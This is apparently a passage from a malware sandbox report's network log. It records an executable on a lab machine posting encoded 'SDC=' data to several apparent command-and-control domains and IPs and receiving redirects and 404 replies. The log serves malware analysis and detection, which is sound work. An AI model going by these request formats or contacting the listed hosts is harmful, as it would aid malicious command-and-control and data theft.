SDC=ehBOiXBMYrlG1FVQotl6abXPplxsXINdjiBer2tnC+xMwImcJx/g6dzWj1Wr+3ZP+oSx5G+UJBYXqkhQ6sGfeeLxcaFXnU93pj13agyJCzLv1gTRUYQ6eW6cgTCJq1mmE6eufUmGmbNnK3MSpZGrCFgzsMpMTi/WU3DRVL9gWx206Z07kgeRUH557U/JpYn3xN3upT4ioLlD9YHn7AkhiJm/6CWRFsV2sq/5+4lJ4rmc/QSLkeSeSjA0fzjBsdK9J0qVoPWHpvda98zNubfnYFqaGvtgdGcw4tDCE7b4TpCkM+wGMTXk0/O8lU568Y6Ry8cZVY8oBFSDCFcE3EeRlBGQzIL6OgHPl16W2HNrFTbKQyMR60XjVegPjbqEiBD5pwyxwtUvxghGGocf+HnmW1GyERuADEckOi4iSfMnL7hb3QBxFFMCtFXvjCZCLJSKxj7goIBhQCWlBUrGfDsvD1ZAQXYIZOB2EbBk2xCDTeUnY0vYYmPTWOgSu9bD6JtVY0qGsEtnGXzSfvL+7WVCO+5JXGPjiJ00t1oKGPzaYp3Rz4RmQd6jcfrlvmjDjA+yZMbSYBJVfH7N3bGw5N+FDHtxicxzG+mvDVclv+u7WughSNjtl4AWQN1qC66K/bZdotiSzSFnQio03V7JkDWzX0oJyxKS/ochCMbmHNQN8H7rbM4PrkxUxJ9dQ7pePEVkH73OkAiFZpcxSn50slbQu8nB5DRFJEP+gYHVNKd5m+puI5ZGQb0wlLjTFlRJAIWUhhdOMOZWoYwzihuwfh33C4ayuQxZcscHcoZk9nO0AEdkdVrU/tv2Vkn1+XnpJrCASM4SZjJa1MS410kTr8NM1V5nco2svasYEFbCovXl0P2U59yYYmTWXsESw4F/z9bkHwEt1xf3PynrnSBZJNnPPdhzQVYbAuHhWgb6pKYZ0DkechehDiUxx41V68G2oNA3uAPpQDXztQ5I31ZVRsLKaBqL0WW08C4WcuPCFuNqd/E6o5c1 [TRUNCATED]
Jan 10, 2025 18:14:12.573359966 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/3q0n/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Fri, 10 Jan 2025 17:14:12 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49988	103.106.67.112	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:14.482413054 CET	476	OUT	GET /3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGBzI/s6vr0u70Fx+osGIx3CSKkpUtFBkz/SLftrHWbhIk1Rz+XVgaXqtFhG2oma8AA== HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:14:15.194541931 CET	605	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Location: https://www.furrcali.xyz/3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGBzI/s6vr0u70Fx+osGIx3CSKkpUtFBkz/SLftrHWbhIk1Rz+XVgaXqtFhG2oma8AA== Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Fri, 10 Jan 2025 17:14:15 GMT Content-Length: 189 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 33 71 30 6e 2f 3f 6d 48 3d 43 70 65 50 79 30 50 26 61 6d 70 3b 53 44 43 3d 54 6a 70 75 68 67 39 48 64 62 35 63 35 48 42 39 6a 50 67 4e 51 4f 76 49 75 57 56 46 4d 35 31 31 6e 43 52 7a 67 46 52 36 48 4a 6c 63 78 70 4c 64 47 42 7a 49 2f 73 36 76 72 30 75 37 30 46 78 2b 6f 73 47 49 78 33 43 53 4b 6b 70 55 74 46 42 6b 7a 2f 53 4c 66 74 72 48 57 62 68 49 6b 31 52 7a 2b 58 56 67 61 58 71 74 46 68 47 32 6f 6d 61 38 41 41 3d 3d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.furrcali.xyz/3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGBzI/s6vr0u70Fx+osGIx3CSKkpUtFBkz/SLftrHWbhIk1Rz+XVgaXqtFhG2oma8AA==">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49989	103.23.149.28	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:28.996279001 CET	735	OUT	POST /8ipa/ HTTP/1.1 Host: www.y6h6kn.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.y6h6kn.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.y6h6kn.top/8ipa/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 41 55 35 33 68 67 4f 48 61 76 7a 6c 56 6f 6e 78 35 46 6b 6e 52 72 6b 4f 6b 76 45 35 71 47 6e 45 43 6b 6d 69 5a 52 39 41 63 50 37 47 5a 49 4e 69 47 48 31 77 66 65 78 6f 6a 67 65 4e 4d 76 6a 38 70 72 67 41 63 66 39 65 7a 56 50 41 72 4e 7a 50 71 4f 45 62 4b 43 62 6f 36 61 6b 57 55 66 39 6c 68 5a 4c 31 32 71 61 31 6c 32 70 74 72 46 69 51 30 74 50 76 47 54 67 50 6a 53 55 59 32 53 46 47 34 58 71 44 49 69 44 32 4d 32 43 55 51 6c 6f 2b 2f 55 4c 66 44 5a 71 73 6d 47 33 4e 51 46 63 4d 57 36 37 77 68 53 79 54 47 53 4d 51 6e 55 6b 32 6b 31 30 38 64 48 7a 4e 5a 77 58 54 Data Ascii: SDC=AU53hgOHavzlVonx5FknRrkOkvE5qGnECkmiZR9AcP7GZINiGH1wfexojgeNMvj8prgAcf9ezVPArNzPqOEbKCbo6akWUf9lhZL12qa1l2ptrFiQ0tPvGTgPjSUY2SFG4XqDIiD2M2CUQlo+/ULfDZqsmG3NQFcMW67whSyTGSMQnUk2k108dHzNZwXT
Jan 10, 2025 18:14:29.879832983 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 17:14:29 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49990	103.23.149.28	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:31.817552090 CET	759	OUT	POST /8ipa/ HTTP/1.1 Host: www.y6h6kn.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.y6h6kn.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.y6h6kn.top/8ipa/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 41 55 35 33 68 67 4f 48 61 76 7a 6c 48 34 33 78 37 6b 6b 6e 47 37 6b 50 36 2f 45 35 67 6d 6e 59 43 6b 69 69 5a 51 35 75 63 39 66 47 5a 73 64 69 48 43 42 77 63 65 78 6f 70 41 65 45 54 66 6a 4e 70 72 73 79 63 65 78 65 7a 55 72 41 72 4d 44 50 71 5a 51 61 4c 53 62 32 79 36 6b 59 4d 2f 39 6c 68 5a 4c 31 32 71 4f 54 6c 77 42 74 73 32 71 51 33 4a 54 73 59 44 67 41 71 79 55 59 38 79 46 43 34 58 71 6c 49 6d 4c 4d 4d 30 4b 55 51 6d 38 2b 2b 42 2f 65 61 70 72 70 69 47 32 4d 47 47 46 51 58 34 62 77 35 67 66 61 54 78 38 33 74 56 5a 78 31 6b 56 72 4f 77 76 44 58 32 69 35 2f 6e 61 76 49 44 74 77 39 35 57 44 35 50 39 50 75 71 67 58 6c 51 3d 3d Data Ascii: SDC=AU53hgOHavzlH43x7kknG7kP6/E5gmnYCkiiZQ5uc9fGZsdiHCBwcexopAeETfjNprsycexezUrArMDPqZQaLSb2y6kYM/9lhZL12qOTlwBts2qQ3JTsYDgAqyUY8yFC4XqlImLMM0KUQm8++B/eaprpiG2MGGFQX4bw5gfaTx83tVZx1kVrOwvDX2i5/navIDtw95WD5P9PuqgXlQ==
Jan 10, 2025 18:14:32.489439011 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 17:14:32 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49991	103.23.149.28	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:34.402323961 CET	1772	OUT	POST /8ipa/ HTTP/1.1 Host: www.y6h6kn.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.y6h6kn.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.y6h6kn.top/8ipa/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 41 55 35 33 68 67 4f 48 61 76 7a 6c 48 34 33 78 37 6b 6b 6e 47 37 6b 50 36 2f 45 35 67 6d 6e 59 43 6b 69 69 5a 51 35 75 63 39 58 47 61 62 31 69 47 68 5a 77 64 65 78 6f 33 51 65 4a 54 66 6a 71 70 6f 63 4d 63 65 4d 72 7a 58 44 41 72 71 58 50 39 38 73 61 42 53 62 32 74 71 6b 5a 55 66 39 4b 68 5a 37 70 32 71 65 54 6c 77 42 74 73 33 61 51 68 74 50 73 61 44 67 50 6a 53 55 63 32 53 45 6c 34 58 6a 51 49 6d 47 78 4d 46 71 55 52 41 63 2b 35 33 6a 65 46 5a 72 72 6c 47 33 66 47 47 35 35 58 34 57 4c 35 6c 4b 2f 54 79 73 33 76 42 4d 4a 67 31 70 52 59 77 43 64 56 6e 43 4f 31 6a 57 70 4e 53 55 44 79 49 57 58 36 74 34 2b 6b 75 6c 49 32 7a 35 56 49 33 4d 55 36 32 79 75 6d 62 6c 66 74 57 61 4c 34 37 54 78 36 68 6a 73 6c 32 4d 6b 38 48 72 39 58 53 6f 49 46 6e 4f 2f 70 6b 6d 68 54 66 69 53 51 39 4f 76 64 45 44 4d 75 42 55 4a 56 2f 35 74 4c 44 4d 42 37 49 6e 70 7a 53 6f 4f 73 63 31 6b 58 55 43 67 36 72 30 36 65 38 51 39 4a 7a 5a 32 52 6e 51 55 4f 69 64 31 68 77 52 64 48 73 6f 4c 73 46 72 4d 72 2f 50 2f 6d 76 [TRUNCATED] Data Ascii: SDC=AU53hgOHavzlH43x7kknG7kP6/E5gmnYCkiiZQ5uc9XGab1iGhZwdexo3QeJTfjqpocMceMrzXDArqXP98saBSb2tqkZUf9KhZ7p2qeTlwBts3aQhtPsaDgPjSUc2SEl4XjQImGxMFqURAc+53jeFZrrlG3fGG55X4WL5lK/Tys3vBMJg1pRYwCdVnCO1jWpNSUDyIWX6t4+kulI2z5VI3MU62yumblftWaL47Tx6hjsl2Mk8Hr9XSoIFnO/pkmhTfiSQ9OvdEDMuBUJV/5tLDMB7InpzSoOsc1kXUCg6r06e8Q9JzZ2RnQUOid1hwRdHsoLsFrMr/P/mvnnx4TC9IRBNnu39T0L3VyTJxsRAhfX1VC/wGVDGbvz4Y38nGN34ZR8RvTTsoxUn8TaABTIHHagYAgfnlr5YTFMOETWFmFSgDFdhZ6bLIa9uMaFwcY3TSws1+vYTl8S1yAN7lWLfj3Jh5Ap7DN85TkQUq2pjn8iE3L3XbVqeSgZljMlh9dWqYlX25iGlnWqPQlo7OZY5fSO+whaHCTY3FT45Btl+jLNr9SrVIJxWqoDWNPvZTRGWjiFOweIFY2fiwA0CiPbN94l1piTGIA/ggiY9DVLBpZUN1jG9rpoetaUVX/9ViXj566hDvFnuPW1wsxwroq56JsNROTl0Ix7uxEQvfIIOzEZllDTk4zEMlPhS0lNA8qYDa/CCI1i8AwLSvIHqPMZgjUS8qxrYGmGKjuRprmAqs/icVwgwuoMb7MPbQWFd7zFN0JHMFwqFDUoW5kVxwbijwqflYx5SSBFvqWHjDBSbr1PHwApqOiq5JC+bX+QgqNdhz+PvvoOsZEpqaB84uWRThebCktrdkvdES5tzFXCM5r3F2U3VQ6Oo/PtKO5JhQxXGfcppN9Mv5/8Bb91IZR7cMpm5xNMCwRUQ8CNRPiUN4556OSowG7Ukm9CoggireFe8xTZboy8RbpAeHaYuZtsbjBZ1UvspV/jr4qlCjXhlsQnBBs0 [TRUNCATED]
Jan 10, 2025 18:14:35.225827932 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 17:14:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49992	103.23.149.28	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:36.951551914 CET	474	OUT	GET /8ipa/?mH=CpePy0P&SDC=NWRXiVj8AMb+XbLG30cHZ8dR/qgEm1X2FzW3Fi5JWafAVcEgASASZtNzkCKKItj93NUCc/pzvW2js9miz8JvOxL+x7FDFMxI/5vVjfiDizU1pDvz1w== HTTP/1.1 Host: www.y6h6kn.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:14:37.803606033 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 17:14:37 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49993	162.0.236.169	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:51.004010916 CET	762	OUT	POST /c69p/ HTTP/1.1 Host: www.digitalpath.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.digitalpath.website Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.digitalpath.website/c69p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 75 77 69 5a 45 30 53 59 62 49 7a 6b 54 6d 4f 6e 61 71 30 2b 66 31 38 30 64 54 4e 31 7a 49 62 54 4a 6b 74 48 61 34 69 62 6e 2f 74 6d 72 76 78 38 72 63 4a 31 78 4a 50 72 71 68 73 77 71 79 42 30 6b 31 2f 44 4a 70 43 45 33 4e 7a 64 5a 45 70 58 63 35 4d 4c 6f 44 58 33 4c 2f 66 7a 64 46 44 4a 59 4d 6b 63 57 77 4c 4c 79 71 45 4d 31 41 39 37 74 34 55 57 62 70 52 61 69 70 6e 39 39 6e 57 44 50 32 76 5a 76 6d 71 2f 32 69 2f 39 37 6f 47 42 35 49 4f 74 6f 2f 6c 79 4b 79 38 47 48 67 78 76 63 55 72 67 4b 43 65 77 76 5a 35 70 6d 6f 45 70 44 34 35 72 63 77 37 36 6b 72 46 49 Data Ascii: SDC=uwiZE0SYbIzkTmOnaq0+f180dTN1zIbTJktHa4ibn/tmrvx8rcJ1xJPrqhswqyB0k1/DJpCE3NzdZEpXc5MLoDX3L/fzdFDJYMkcWwLLyqEM1A97t4UWbpRaipn99nWDP2vZvmq/2i/97oGB5IOto/lyKy8GHgxvcUrgKCewvZ5pmoEpD45rcw76krFI
Jan 10, 2025 18:14:51.587500095 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:14:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49994	162.0.236.169	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:53.558306932 CET	786	OUT	POST /c69p/ HTTP/1.1 Host: www.digitalpath.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.digitalpath.website Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.digitalpath.website/c69p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 75 77 69 5a 45 30 53 59 62 49 7a 6b 53 46 47 6e 57 72 30 2b 58 31 38 37 59 54 4e 31 39 6f 62 58 4a 6b 68 48 61 36 4f 4c 6e 4e 35 6d 71 4f 42 38 71 64 4a 31 32 4a 50 72 6c 78 73 31 31 69 41 5a 6b 31 69 2b 4a 73 69 45 33 4e 6e 64 5a 45 5a 58 66 4b 6b 49 75 54 58 78 65 76 66 78 54 6c 44 4a 59 4d 6b 63 57 30 62 31 79 71 4d 4d 31 77 4e 37 69 38 34 56 57 4a 52 5a 6c 70 6e 39 73 33 57 48 50 32 76 65 76 6e 6d 47 32 6b 37 39 37 71 65 42 35 39 75 71 69 2f 6c 77 48 53 39 49 4f 7a 73 68 5a 6c 58 72 47 77 32 43 35 66 68 51 6f 70 35 75 53 70 59 38 50 48 6e 30 71 74 77 69 52 47 6c 52 69 56 31 70 5a 2f 59 58 38 77 54 6b 4f 6a 7a 54 66 67 3d 3d Data Ascii: SDC=uwiZE0SYbIzkSFGnWr0+X187YTN19obXJkhHa6OLnN5mqOB8qdJ12JPrlxs11iAZk1i+JsiE3NndZEZXfKkIuTXxevfxTlDJYMkcW0b1yqMM1wN7i84VWJRZlpn9s3WHP2vevnmG2k797qeB59uqi/lwHS9IOzshZlXrGw2C5fhQop5uSpY8PHn0qtwiRGlRiV1pZ/YX8wTkOjzTfg==
Jan 10, 2025 18:14:54.184365034 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:14:54 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49995	162.0.236.169	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:56.109831095 CET	1799	OUT	POST /c69p/ HTTP/1.1 Host: www.digitalpath.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.digitalpath.website Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.digitalpath.website/c69p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 75 77 69 5a 45 30 53 59 62 49 7a 6b 53 46 47 6e 57 72 30 2b 58 31 38 37 59 54 4e 31 39 6f 62 58 4a 6b 68 48 61 36 4f 4c 6e 4e 68 6d 71 34 56 38 72 2b 68 31 33 4a 50 72 6a 42 73 30 31 69 41 68 6b 31 36 79 4a 73 6e 2f 33 50 66 64 59 6e 52 58 65 2f 51 49 67 54 58 78 42 66 66 77 64 46 43 